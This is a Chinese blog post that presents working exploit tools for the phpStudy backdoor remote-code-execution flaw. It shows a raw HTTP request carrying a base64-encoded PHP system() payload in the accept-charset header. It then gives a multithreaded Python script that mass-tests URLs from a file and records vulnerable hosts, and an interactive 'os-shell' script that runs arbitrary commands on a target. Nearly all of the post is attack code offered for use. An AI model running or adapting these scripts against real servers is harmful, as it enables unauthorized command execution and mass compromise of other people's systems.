php批量发包,phpstudy后门rce批量利用脚本

写两个 一个批量检测的  一个交互式shell的

暂时py  图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Connection: close

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Encoding: gzip,deflate

Upgrade-Insecure-Requests: 1

98dbe2cfc9c849eadc58083bc2b9c939.png

4d9772b0d439182015e0c0851e41311c.png

执行那段写shell即可

2554b891240c739fce266780674585cb.png

晚上抽点空简单写个发包的py:

3078a40a3a2cab057b5437535096ed8e.png

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport queueprint("======Phpstudy Backdoor Exploit============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")payload = "echo \"qing\";"payload = base64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {'Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3','Accept-Language': 'zh-CN,zh;q=0.9','accept-charset': payload,'Accept-Encoding': 'gzip,deflate','Connection': 'close',}def write_shell(url,headers):try:r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)if "qing" in r.text:print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')with open('success.txt','a') as f:f.write(url+'\n')else:print ('[ - ] BackDoor failed: '+url+'[ - ]\n')except:print ('[ - ] Timeout: '+url+' [ - ]\n')url = "http://xxx"write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport threadpoolprint("======Phpstudy Backdoor Exploit============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")def write_shell(url):payload = "echo \"qing\";"payload = base64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {'Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3','Accept-Language': 'zh-CN,zh;q=0.9','accept-charset': payload,'Accept-Encoding': 'gzip,deflate','Connection': 'close',}try:r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)if "qing" in r.text:print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')with open('success.txt','a') as f:f.write(url+'\n')else:print ('[ - ] BackDoor failed: '+url+'[ - ]\n')except:print ('[ - ] Timeout: '+url+' [ - ]\n')# url = "http://xxx"# write_shell(url=url,headers=headers)def main():with open('url.txt','r') as f:lines = f.read().splitlines()task_pool=threadpool.ThreadPool(5)requests=threadpool.makeRequests(write_shell,lines)for req in requests:task_pool.putRequest(req)task_pool.wait()if __name__ == '__main__':main()#线程队列部分# th=[]# th_num=10# for x in range(th_num):# t=threading.Thread(target=write_shell)# th.append(t)# for x in range(th_num):# th[x].start()# for x in range(th_num):# th[x].join()

48f3ba1e286e7ec949e89fef955f4463.png

你也可以加上读取php文件的字典  这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport threadpoolimport reprint("======Phpstudy Backdoor Exploit---os-shell============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")def os_shell(url,headers,payload):try:r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)# print(r.text)res = re.findall("qing(.*?)qing",r.text,re.S)print("[ + ]===========The Response:==========[ + ]\n")res = "".join(res)print(res)except:print("[ - ]===========Failed! Timeout...==========[ - ]\n")def main():url = input("input the Url , example:\"http://127.0.0.1/\"\n")payload = input("input the payload , default:echo system(\"whoami\");\n")de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"if payload.strip() == '':payload = de_payloadpayload = "echo \"qing\";"+payload+"echo \"qing\";"payload = base64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {'Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3','Accept-Language': 'zh-CN,zh;q=0.9','accept-charset': payload,'Accept-Encoding': 'gzip,deflate','Connection': 'close',}os_shell(url=url,headers=headers,payload=payload)if __name__ == '__main__':main()

d1fc88022fc1f62477ea1920748102f4.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值